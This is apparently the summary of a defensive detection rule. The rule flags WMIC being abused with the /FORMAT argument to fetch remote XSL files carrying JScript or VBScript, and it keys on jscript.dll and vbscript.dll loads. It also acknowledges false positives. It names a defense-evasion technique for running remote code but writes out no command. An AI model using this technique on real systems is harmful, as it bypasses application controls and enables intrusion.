This detection rule focuses on identifying the misuse of Windows Management Instrumentation Command-line (WMIC) to load scripting libraries, specifically targeting malicious activities where threat actors execute code from a remote source. WMIC can be exploited with the `/FORMAT` argument to manipulate data formats and download malicious XSL files such as JavaScript (.js) or VBScript (.vbs). This is a form of defense evasion, allowing attackers to bypass application controls aimed at restricting executable content. The detection relies on observing the loading of specific dynamic-link libraries (DLLs) that would indicate malicious activity when loaded by the WMIC command, particularly jscript.dll and vbscript.dll. This rule is designed to help security teams track instances of potential exploitation in a Windows environment and responds to tactics utilized by sophisticated attackers. False positives are acknowledged, including legitimate uses of WMIC that load vbscript.dll when retrieving system information. Therefore, a thorough investigation into process creation events leading up to the WMIC execution is recommended for clearer context.